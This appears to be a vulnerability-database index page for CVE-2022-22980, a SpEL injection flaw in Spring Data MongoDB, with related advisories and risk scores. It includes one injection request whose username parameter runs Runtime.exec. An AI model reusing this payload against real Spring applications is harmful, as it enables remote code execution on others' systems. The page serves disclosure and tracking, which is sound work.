Lucene search

Exploit for Expression Language Injection in Vmware Spring Data Mongodb

🗓️ 22 Jun 2022 07:22:51Type

Exploit for Expression Language Injection in Vmware Spring Data Mongodb. Start redis on port 27017, project on springboot starts on port 6666. Injection example: GET /v1/user/get?username=T(java.lang.Runtime).getRuntime().exec('open+-a+calculator.app') HTTP/1.

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 23
Veracode	SpEL Injection Attacks	21 Jun 202202:43	–	veracode
RedhatCVE	CVE-2022-22980	30 Jun 202218:35	–	redhatcve
Spring Engineering	Spring Data MongoDB SpEL Expression Injection Vulnerability (CVE-2022-22980)	20 Jun 202212:39	–	spring
Spring Engineering	This Week in Spring - June 21st, 2022	21 Jun 202207:00	–	spring
GithubExploit	Exploit for Expression Language Injection in Vmware Spring Data Mongodb	22 Jun 202207:51	–	githubexploit
GithubExploit	Exploit for Expression Language Injection in Vmware Spring Data Mongodb	21 Jun 202212:02	–	githubexploit
GithubExploit	Exploit for Expression Language Injection in Vmware Spring Data Mongodb	22 Jun 202207:39	–	githubexploit
GithubExploit	Exploit for Expression Language Injection in Vmware Spring Data Mongodb	21 Jun 202211:39	–	githubexploit
OSV	GHSA-W24X-87MR-4R23 SpEL Injection in Spring Data MongoDB	24 Jun 202200:00	–	osv
OSV	CVE-2022-22980	23 Jun 202217:15	–	osv

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

22 Jun 2022 07:51Current

9.6High risk

Vulners AI Score9.6

CVSS26.8

CVSS39.8

EPSS0.86349